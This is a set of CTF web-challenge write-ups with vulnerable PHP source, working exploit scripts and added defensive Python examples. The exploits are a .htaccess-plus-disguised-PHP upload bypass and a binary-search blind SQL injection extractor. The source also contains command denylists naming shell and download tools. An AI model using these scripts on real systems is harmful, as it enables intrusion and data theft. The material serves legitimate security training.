[De1CTF 2019]SSRF Me
[安洵杯 2019]easy_web
Opening the page first, I saw a cmd in the URL and assumed it was RCE; then I saw the hint.
Decoding it twice in a row gives an md5-looking number; I assumed it was md5, but I'm still too much of a noob: it turned out to be a hex number.
Generating the parameter for index.php gives TmprMlpUWTBOalUzT0RKbE56QTJPRGN3; decoding the result gives the source:
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// img is base64(base64(hex(filename)))
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
// denylist sanitiser: strips everything except letters, digits and dots
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
// denylist of commands and shell metacharacters for cmd
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // a and b must differ as strings but share an md5() result
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
<html>
<style>
body{
    background:url(./bj.png) no-repeat center center;
    background-size:cover;
    background-attachment:fixed;
    background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
Then a and b can't be sent with HackBar, because HackBar URL-encodes once by default, so use Burp.
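The img decode chain the notes above describe (two base64 decodes, then hex2bin), together with an allowlist check that would replace the two denylist regexes in index.php, as an added Python example; this is not code from the writeup or the challenge. PHP's base64_decode tolerates the missing "=" padding that the redirect URL drops, which Python's does not, so the decoder restores it. IMAGE_DIR and ALLOWED_EXT are assumptions; the challenge never states where the images live.

```python
import base64
import binascii
import os

# Assumed directory the images live in; the challenge never states it.
IMAGE_DIR = "/var/www/html/images"
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}


def _b64decode_lenient(s: str) -> bytes:
    # PHP's base64_decode tolerates missing '=' padding (the redirect URL in
    # index.php drops it); Python's does not, so restore it before decoding.
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_img(param: str) -> str:
    """The chain index.php applies: base64_decode twice, then hex2bin."""
    once = _b64decode_lenient(param).decode("ascii")
    hexed = _b64decode_lenient(once).decode("ascii")
    return binascii.unhexlify(hexed).decode("utf-8")


def encode_img(filename: str) -> str:
    """Inverse of decode_img: hex, then base64 twice (what the redirect builds)."""
    hexed = binascii.hexlify(filename.encode("utf-8"))
    return base64.b64encode(base64.b64encode(hexed)).decode("ascii")


def safe_image_path(param: str, base_dir: str = IMAGE_DIR):
    """Allowlist replacement for the denylist regexes in index.php: accept the
    decoded name only if it is a plain image file directly inside base_dir.
    Returns the resolved path, or None when anything is off."""
    try:
        name = decode_img(param)
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        return None
    # A bare file name: no directory parts, no dotfiles, no NUL bytes.
    if name != os.path.basename(name) or name.startswith(".") or "\x00" in name:
        return None
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        return None
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, name))
    # Defence in depth: the resolved path must still sit under base_dir.
    if os.path.commonpath([base, full]) != base:
        return None
    return full
```

With this check, the parameter from the redirect (TXpVek5UTTFNbVUzTURabE5qYz0, i.e. 555.png) resolves to a path under IMAGE_DIR, while the parameter built for index.php is refused because .php is not an allowed image extension, and no amount of encoding changes that; the "flag" substring check in the challenge is the kind of denylist this makes unnecessary.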
[GXYCTF2019]BabyUpload
import requests

url = "http://a49eadda-16e3-4db7-8d9c-6bc1aa62bca8.node3.buuoj.cn"
session = requests.session()
# first upload: an .htaccess that makes Apache treat .jpg as PHP
htaccess = {
    'uploaded': ('.htaccess', "AddType application/x-httpd-php .jpg", 'image/jpeg')
}
r1 = session.post(url, files=htaccess)
# second upload: a "jpg" whose body is PHP
files2 = {
    'uploaded': ('6.jpg', "<script language=\"php\">echo file_get_contents(\"/flag\");</script>", 'image/jpeg')
}
res = session.post(url, files=files2)
print(res.text)
Then visit it to get the flag.
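Both uploads in the script above get through because the server trusts the client-supplied name and Content-Type. As an added example (not part of the writeup), here is the validation an upload handler needs in order to refuse them: the file name is matched against an allowlist (which rejects dotfiles such as .htaccess outright), the extension must be an image type, the body must start with that type's magic bytes, and the client's Content-Type is ignored. The MAGIC table, the name pattern and the storage scheme are this example's own choices, not the challenge's.

```python
import os
import re
import secrets

# Extension -> leading bytes ("magic") an honest file of that type starts with.
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}
# One base name, one short extension, no leading dot and no separators:
# rejects ".htaccess", "a/b.jpg" and "x.php.jpg" before anything else runs.
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}$")
# Markers of server-side code that should never be inside an image. This is a
# secondary check only: polyglot files can evade it, so the upload directory
# must also be served with script execution disabled and .htaccess ignored.
CODE_MARKERS = (b"<?php", b"<?=", b"<script")


def check_upload(filename: str, content: bytes, content_type: str = None):
    """Return (accepted, reason). content_type is ignored on purpose: it is
    chosen by the client, exactly like the 'image/jpeg' in the script above."""
    if not NAME_RE.fullmatch(filename):
        return False, "filename rejected"
    ext = os.path.splitext(filename)[1].lower()
    magic = MAGIC.get(ext)
    if magic is None:
        return False, "extension not allowed"
    if not content.startswith(magic):
        return False, "content does not look like " + ext
    if any(marker in content.lower() for marker in CODE_MARKERS):
        return False, "embedded code marker"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Never reuse the client's name on disk: random name, extension forced
    from the already-validated allowlist extension."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext
```

Against the two requests from the script, the .htaccess fails the name check and 6.jpg fails the magic-byte check; a real JPEG with a PHP tag appended is caught by the marker scan. The random storage name removes the last piece the attacker controlled, the path they would later browse to.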
[BJDCTF2020]Mark loves cat
The page opens to a pile of useless stuff; sure enough, it's git source leakage.
BUU's Docker environment errored and tripped me up for a while; it's fine now.
This is the key code:
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
// variable variables: every POST key becomes a variable named after it
foreach($_POST as $x => $y){
    $$x = $y;
}
// every GET key becomes a variable holding the value of the variable named by $y
foreach($_GET as $x => $y){
    $$x = $$y;
}
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($is);
}
echo "the flag is: ".$flag;
我有一个数据库 (I have a database)
Too easy: CVE-2018-12613.
[BJDCTF2020]The mystery of ip
Didn't save the earlier part, too lazy to write it up.
Found nothing. Went to look at the writeup.
Smarty template injection.
[BJDCTF2020]ZJCTF,不过如此 (ZJCTF, nothing special)
Code audit:
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
// text is read through file_get_contents, so any readable stream wrapper works
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }
    include($file); //next.php
}
else{
    highlight_file(__FILE__);
}
?>
Local file inclusion combined with PHP stream wrappers (php:// pseudo-protocols).
preg_replace() /e mode command execution.
[GKCTF2020]CheckIN
[GYCTF2020]Ezsqli
import requests

url = "http://5a3ceadf-9981-4fb8-a8c0-5a04a4d8fbf1.node3.buuoj.cn/index.php"
result = ""
i = 0
while True:
    i = i + 1
    # binary search over printable ASCII for character i of the result
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # payload = "0^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})".format(i, mid)
        payload = "0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})".format(i, mid)
        data = {
            "id": payload
        }
        r = requests.post(url, data=data)
        r.encoding = "utf-8"
        # print(url+payload)
        if "Nu1L" in r.text:  # condition true: the character is above mid
            head = mid + 1
        else:
            # print(r.text)
            tail = mid
    last = result
    if head != 32:
        result += chr(head)
    else:
        break  # no printable character left: end of the string
print(result)
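The script above needs about seven requests per extracted character, each carrying the same ascii(substr(...)) probe with a changing threshold, which is a distinctive shape in server-side logs. As an added example (not part of the writeup), the detector below parses a constructed request log in a simple "timestamp client method path param=value" format, classifies parameter values that look like blind-injection probes, and raises an alert for any client that sends at least threshold of them inside a sliding window; it also reports which substr offsets were being probed, i.e. how far the extraction had progressed. The log format, the pattern list, and the window and threshold values are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed request log, not taken from the page: "timestamp client method path param=value".
# The 10.0.0.5 lines imitate the script above working through character 1 of the
# extracted string with a binary search (seven probes), then starting character 2.
SAMPLE_LOG = """\
2020-03-01T10:00:00 10.0.0.5 POST /index.php id=0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),1,1))>79)
2020-03-01T10:00:01 10.0.0.5 POST /index.php id=0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),1,1))>103)
2020-03-01T10:00:01 10.0.0.5 POST /index.php id=0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),1,1))>91)
2020-03-01T10:00:02 10.0.0.5 POST /index.php id=0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),1,1))>97)
2020-03-01T10:00:02 10.0.0.5 POST /index.php id=0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),1,1))>100)
2020-03-01T10:00:03 10.0.0.5 POST /index.php id=0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),1,1))>101)
2020-03-01T10:00:03 10.0.0.5 POST /index.php id=0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),1,1))>102)
2020-03-01T10:00:05 10.0.0.9 POST /index.php id=3
2020-03-01T10:00:06 10.0.0.9 POST /index.php id=12
2020-03-01T10:00:07 10.0.0.5 POST /index.php id=0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),2,1))>79)
"""

BLIND_PATTERNS = [
    re.compile(r"ascii\s*\(\s*substr", re.I),           # character-at-a-time extraction
    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),      # time-based variant
    re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),  # classic 1=1 / 1=2 probes
    re.compile(r"^\s*\d+\s*\^\s*\("),                   # XOR-wrapped condition, as in the script above
]
POSITION_RE = re.compile(r",\s*(\d+)\s*,\s*1\s*\)")     # the "<offset>,1)" tail of substr(...)


def looks_like_blind_sqli(value: str) -> bool:
    return any(p.search(value) for p in BLIND_PATTERNS)


def parse_line(line: str) -> dict:
    ts, ip, method, path, query = line.split(" ", 4)
    param, _, value = query.partition("=")
    return {"ts": datetime.fromisoformat(ts), "ip": ip, "method": method,
            "path": path, "param": param, "value": value}


def detect(log_text: str, window_seconds: int = 60, threshold: int = 5) -> dict:
    """Flag clients that send at least `threshold` blind-SQLi-looking requests
    within any `window_seconds` span.
    Returns {ip: {"requests": n, "positions": [probed substr offsets]}}."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if looks_like_blind_sqli(rec["value"]):
            per_ip[rec["ip"]].append((rec["ts"], rec["value"]))
    alerts = {}
    for ip, hits in per_ip.items():
        hits.sort()
        # Busiest sliding window of window_seconds over the sorted timestamps.
        best, j = 0, 0
        for i, (t, _) in enumerate(hits):
            while (t - hits[j][0]).total_seconds() > window_seconds:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            positions = set()
            for _, value in hits:
                m = POSITION_RE.search(value)
                if m:
                    positions.add(int(m.group(1)))
            alerts[ip] = {"requests": best, "positions": sorted(positions)}
    return alerts
```

The threshold matters more than the patterns: a single probe can be a false positive, but seven near-identical probes in a few seconds with only the comparison value changing is the binary search itself. The offsets in "positions" tell the responder how many characters had already been read when the alert fired.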